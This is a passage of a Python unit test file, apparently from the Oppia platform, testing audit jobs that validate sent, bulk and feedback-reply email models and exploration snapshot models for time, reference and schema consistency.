        self.recipient_email = 'recipient@email.com'
        self.recipient_id = 'recipient'
        self.recipient_model = user_models.UserSettingsModel(
            id=self.recipient_id, email=self.recipient_email)
        self.recipient_model.put()

        with self.swap(
            email_models.SentEmailModel, '_generate_hash',
            types.MethodType(mock_generate_hash, email_models.SentEmailModel)):
            email_models.SentEmailModel.create(
                self.recipient_id, self.recipient_email, self.sender_id,
                self.sender_email, feconf.EMAIL_INTENT_SIGNUP,
                'Email Subject', 'Email Body', datetime.datetime.utcnow())

        self.model_instance = email_models.SentEmailModel.get_by_hash(
            'Email Hash')[0]

        self.job_class = (
            prod_validation_jobs_one_off.SentEmailModelAuditOneOffJob)

    def test_standard_model(self):
        """The freshly created model validates cleanly."""
        expected_output = [u'[u\'fully-validated SentEmailModel\', 1]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of SentEmailModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock, last_updated appears future-dated and
        fails the current-time check.
        """
        # Push sent_datetime back so only the last_updated check fires.
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() - datetime.timedelta(hours=20))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_sender_id(self):
        """A missing sender UserSettingsModel fails the sender_id check."""
        self.sender_model.delete()
        expected_output = [(
            u'[u\'failed validation check for sender_id field check of '
            'SentEmailModel\', '
            '[u"Entity id %s: based on field sender_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.sender_id, self.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_recipient_id(self):
        """A missing recipient UserSettingsModel fails the recipient_id
        check.
        """
        self.recipient_model.delete()
        expected_output = [(
            u'[u\'failed validation check for recipient_id field check of '
            'SentEmailModel\', '
            '[u"Entity id %s: based on field recipient_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.recipient_id, self.recipient_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_sender_email(self):
        """A sender email mismatching the sender user's email fails the
        sender email check.
        """
        self.sender_model.email = 'invalid@email.com'
        self.sender_model.put()
        expected_output = [(
            u'[u\'failed validation check for sender email check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: Sender email %s in entity does not match with '
            'email %s of user obtained through sender id %s\']]') % (
                self.model_instance.id, self.model_instance.sender_email,
                self.sender_model.email, self.model_instance.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_recipient_email(self):
        """A recipient email mismatching the recipient user's email fails
        the recipient email check.
        """
        self.recipient_model.email = 'invalid@email.com'
        self.recipient_model.put()
        expected_output = [(
            u'[u\'failed validation check for recipient email check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: Recipient email %s in entity does not match '
            'with email %s of user obtained through recipient id %s\']]') % (
                self.model_instance.id, self.model_instance.recipient_email,
                self.recipient_model.email, self.model_instance.recipient_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_sent_datetime_greater_than_current_time(self):
        """A sent_datetime in the future fails the sent datetime check."""
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for sent datetime check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: The sent_datetime field has a value %s '
            'which is greater than the time when the job was run\']]') % (
                self.model_instance.id, self.model_instance.sent_datetime)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id(self):
        """An id that does not match the expected regex fails the model id
        check.
        """
        model_instance_with_invalid_id = email_models.SentEmailModel(
            id='invalid', recipient_id=self.recipient_id,
            recipient_email=self.recipient_email, sender_id=self.sender_id,
            sender_email=self.sender_email, intent=feconf.EMAIL_INTENT_SIGNUP,
            subject='Email Subject', html_body='Email Body',
            sent_datetime=datetime.datetime.utcnow())
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated SentEmailModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: Entity id does not match regex pattern\']]'
        ) % 'invalid']
        run_job_and_check_output(self, expected_output, sort=True)
class BulkEmailModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the BulkEmailModel audit job."""

    def setUp(self):
        """Creates a sender, two recipients and one bulk email model, and
        registers the audit job under test.
        """
        super(BulkEmailModelValidatorTests, self).setUp()

        self.sender_email = 'sender@email.com'
        self.sender_id = 'sender'
        self.sender_model = user_models.UserSettingsModel(
            id=self.sender_id, email=self.sender_email)
        self.sender_model.put()

        self.recipient_ids = ['recipient1', 'recipient2']
        self.recipient_model_1 = user_models.UserSettingsModel(
            id=self.recipient_ids[0], email='recipient1@email.com')
        self.recipient_model_1.put()
        self.recipient_model_2 = user_models.UserSettingsModel(
            id=self.recipient_ids[1], email='recipient2@email.com')
        self.recipient_model_2.put()

        self.model_id = 'bulkemailid1'
        email_models.BulkEmailModel.create(
            self.model_id, self.recipient_ids, self.sender_id,
            self.sender_email, feconf.BULK_EMAIL_INTENT_MARKETING,
            'Email Subject', 'Email Body', datetime.datetime.utcnow())
        self.model_instance = email_models.BulkEmailModel.get_by_id(
            self.model_id)

        self.job_class = (
            prod_validation_jobs_one_off.BulkEmailModelAuditOneOffJob)

    def test_standard_model(self):
        """The freshly created model validates cleanly."""
        expected_output = [u'[u\'fully-validated BulkEmailModel\', 1]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of BulkEmailModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock, last_updated appears future-dated and
        fails the current-time check.
        """
        # Push sent_datetime back so only the last_updated check fires.
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() - datetime.timedelta(hours=20))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_sender_id(self):
        """A missing sender UserSettingsModel fails the sender_id check."""
        self.sender_model.delete()
        expected_output = [(
            u'[u\'failed validation check for sender_id field check of '
            'BulkEmailModel\', '
            '[u"Entity id %s: based on field sender_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.sender_id, self.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_recipient_id(self):
        """A missing recipient UserSettingsModel fails the recipient_id
        check.
        """
        self.recipient_model_1.delete()
        expected_output = [(
            u'[u\'failed validation check for recipient_id field check of '
            'BulkEmailModel\', '
            '[u"Entity id %s: based on field recipient_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.recipient_ids[0],
                self.recipient_ids[0])]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_sender_email(self):
        """A sender email mismatching the sender user's email fails the
        sender email check.
        """
        self.sender_model.email = 'invalid@email.com'
        self.sender_model.put()
        expected_output = [(
            u'[u\'failed validation check for sender email check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: Sender email %s in entity does not match with '
            'email %s of user obtained through sender id %s\']]') % (
                self.model_instance.id, self.model_instance.sender_email,
                self.sender_model.email, self.model_instance.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_sent_datetime_greater_than_current_time(self):
        """A sent_datetime in the future fails the sent datetime check."""
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for sent datetime check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: The sent_datetime field has a value %s '
            'which is greater than the time when the job was run\']]') % (
                self.model_instance.id, self.model_instance.sent_datetime)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id(self):
        """An id that does not match the expected regex fails the model id
        check.
        """
        model_instance_with_invalid_id = email_models.BulkEmailModel(
            id='invalid:id', recipient_ids=self.recipient_ids,
            sender_id=self.sender_id, sender_email=self.sender_email,
            intent=feconf.BULK_EMAIL_INTENT_MARKETING,
            subject='Email Subject', html_body='Email Body',
            sent_datetime=datetime.datetime.utcnow())
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated BulkEmailModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: Entity id does not match regex pattern\']]'
        ) % model_instance_with_invalid_id.id]
        run_job_and_check_output(self, expected_output, sort=True)
class GeneralFeedbackEmailReplyToIdModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the GeneralFeedbackEmailReplyToIdModel audit job."""

    def setUp(self):
        """Creates a feedback thread, a user, and one reply-to-id model
        keyed on both, and registers the audit job under test.
        """
        super(GeneralFeedbackEmailReplyToIdModelValidatorTests, self).setUp()

        self.thread_id = feedback_services.create_thread(
            'exploration', 'expid', None, 'a subject', 'some text')

        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)

        self.model_instance = (
            email_models.GeneralFeedbackEmailReplyToIdModel.create(
                self.user_id, self.thread_id))
        self.model_instance.put()

        self.job_class = (
            prod_validation_jobs_one_off
            .GeneralFeedbackEmailReplyToIdModelAuditOneOffJob)

    def test_standard_model(self):
        """The freshly created model validates cleanly."""
        expected_output = [(
            u'[u\'fully-validated GeneralFeedbackEmailReplyToIdModel\', 1]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of GeneralFeedbackEmailReplyToIdModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock, last_updated appears future-dated and
        fails the current-time check.
        """
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_user_id(self):
        """A missing user model fails the item.id.user_id field check."""
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [(
            u'[u\'failed validation check for item.id.user_id field check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u"Entity id %s: based on field item.id.user_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.user_id, self.user_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_thread_id(self):
        """A missing thread model fails the item.id.thread_id field
        check.
        """
        feedback_models.GeneralFeedbackThreadModel.get_by_id(
            self.thread_id).delete()
        expected_output = [(
            u'[u\'failed validation check for item.id.thread_id field check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u"Entity id %s: based on field item.id.thread_id having value '
            '%s, expect model GeneralFeedbackThreadModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.thread_id, self.thread_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_reply_to_id(self):
        """A reply_to_id longer than the allowed maximum fails the length
        check.
        """
        # Grow reply_to_id until it exceeds REPLY_TO_ID_LENGTH.
        while len(
                self.model_instance.reply_to_id) <= (
                    email_models.REPLY_TO_ID_LENGTH):
            self.model_instance.reply_to_id = (
                self.model_instance.reply_to_id + 'invalid')
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for reply_to_id length check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u\'Entity id %s: reply_to_id %s should have length less than or '
            'equal to %s but instead has length %s\']]'
        ) % (
            self.model_instance.id, self.model_instance.reply_to_id,
            email_models.REPLY_TO_ID_LENGTH,
            len(self.model_instance.reply_to_id))]
        run_job_and_check_output(self, expected_output)
class ExplorationModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the ExplorationModel audit job."""

    def setUp(self):
        """Creates three explorations (ids '0'-'2'); exploration '0' uses
        language code 'ar' so it can be invalidated later by shrinking the
        allowed language list.
        """
        super(ExplorationModelValidatorTests, self).setUp()

        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)

        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)

        language_codes = ['ar', 'en', 'en']
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]

        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)

        self.model_instance_0 = exp_models.ExplorationModel.get_by_id('0')
        self.model_instance_1 = exp_models.ExplorationModel.get_by_id('1')
        self.model_instance_2 = exp_models.ExplorationModel.get_by_id('2')

        self.job_class = (
            prod_validation_jobs_one_off.ExplorationModelAuditOneOffJob)

    def test_standard_operation(self):
        """All exploration models validate when nothing is broken."""
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')

        expected_output = [
            u'[u\'fully-validated ExplorationModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock, last_updated appears future-dated and
        fails the current-time check.
        """
        # Remove the other two explorations so only instance 0 is reported.
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_exploration_schema(self):
        """Restricting the allowed language codes makes exploration '0'
        ('ar') fail domain validation.
        """
        expected_output = [
            (
                u'[u\'failed validation check for domain object check of '
                'ExplorationModel\', '
                '[u\'Entity id %s: Entity fails domain validation with the '
                'error Invalid language_code: %s\']]'
            ) % (self.model_instance_0.id, self.model_instance_0.language_code),
            u'[u\'fully-validated ExplorationModel\', 2]']
        with self.swap(
            constants, 'ALL_LANGUAGE_CODES', [{
                'code': 'en', 'description': 'English'}]):
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_commit_log_entry_model_failure(self):
        """A missing commit log entry fails the
        exploration_commit_log_entry_ids field check.
        """
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        exp_models.ExplorationCommitLogEntryModel.get_by_id(
            'exploration-0-1').delete()

        expected_output = [
            (
                u'[u\'failed validation check for '
                'exploration_commit_log_entry_ids field check of '
                'ExplorationModel\', '
                '[u"Entity id 0: based on field '
                'exploration_commit_log_entry_ids having value '
                'exploration-0-1, expect model ExplorationCommitLogEntryModel '
                'with id exploration-0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_summary_model_failure(self):
        """A missing summary model fails the exp_summary_ids field
        check.
        """
        exp_models.ExpSummaryModel.get_by_id('0').delete()

        expected_output = [
            (
                u'[u\'failed validation check for exp_summary_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field exp_summary_ids having '
                'value 0, expect model ExpSummaryModel with id 0 '
                'but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_rights_model_failure(self):
        """A missing rights model fails the exploration_rights_ids field
        check.
        """
        exp_models.ExplorationRightsModel.get_by_id(
            '0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])

        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field exploration_rights_ids '
                'having value 0, expect model ExplorationRightsModel '
                'with id 0 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """A missing snapshot metadata model fails the
        snapshot_metadata_ids field check.
        """
        exp_models.ExplorationSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model ExplorationSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """A missing snapshot content model fails the
        snapshot_content_ids field check.
        """
        exp_models.ExplorationSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model ExplorationSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the ExplorationSnapshotMetadataModel audit job."""

    def setUp(self):
        """Creates three explorations; exploration '0' is saved by a
        plain user (not the owner) so its snapshots have a distinct
        committer.
        """
        super(ExplorationSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)

        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]

        for exp in explorations:
            if exp.id != '0':
                exp_services.save_new_exploration(self.owner_id, exp)
            else:
                exp_services.save_new_exploration(self.user_id, exp)

        self.model_instance_0 = (
            exp_models.ExplorationSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationSnapshotMetadataModel.get_by_id(
                '2-1'))

        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """All snapshot metadata models validate when nothing is
        broken.
        """
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock, last_updated appears future-dated and
        fails the current-time check.
        """
        # Remove the other two snapshots so only instance 0 is reported.
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting the parent exploration makes the exploration_ids
        field check fail for both of its snapshot metadata models.
        """
        exp_models.ExplorationModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field exploration_ids '
                'having value 0, expect model ExplorationModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_ids having value 0, expect model '
                'ExplorationModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(
            self, expected_output, literal_eval=True)

    def test_missing_committer_model_failure(self):
        """Deleting the committer's UserSettingsModel fails the
        committer_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'ExplorationSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_exploration_version_in_model_id(self):
        """A snapshot metadata model whose id encodes a version larger
        than the exploration's version fails the version check.
        """
        # Id '0-3' claims version 3, but exploration '0' is at version 1.
        model_with_invalid_version_in_id = (
            exp_models.ExplorationSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration model '
                'version check of ExplorationSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: Exploration model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated ExplorationSnapshotMetadataModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    # NOTE(review): method name misspells 'schema' as 'schmea'; kept as-is
    # to avoid changing the test's discovered name.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit commands with missing required or extra attributes
        fail commit-cmd schema validation, one error per command name.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_state'
        }, {
            'cmd': 'delete_state',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit '
                'cmd delete_state check of '
                'ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_state\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'state_name, The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit '
                'cmd add_state check of '
                'ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_state\'} '
                'failed with error: The following required attributes '
                'are missing: state_name"]]'
            ), u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the ExplorationSnapshotContentModel audit job."""

    def setUp(self):
        """Creates three explorations so three snapshot content models
        ('0-1', '1-1', '2-1') exist, and registers the audit job.
        """
        super(ExplorationSnapshotContentModelValidatorTests, self).setUp()

        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)

        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]

        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)

        self.model_instance_0 = (
            exp_models.ExplorationSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationSnapshotContentModel.get_by_id(
                '2-1'))

        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """All snapshot content models validate when nothing is broken."""
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated ExplorationSnapshotContentModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock, last_updated appears future-dated and
        fails the current-time check.
        """
        # Remove the other two snapshots so only instance 0 is reported.
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Deleting the parent exploration makes the exploration_ids
        field check fail for both of its snapshot content models.
        """
        exp_models.ExplorationModel.get_by_id('0').delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field exploration_ids '
                'having value 0, expect model ExplorationModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_ids having value 0, expect model '
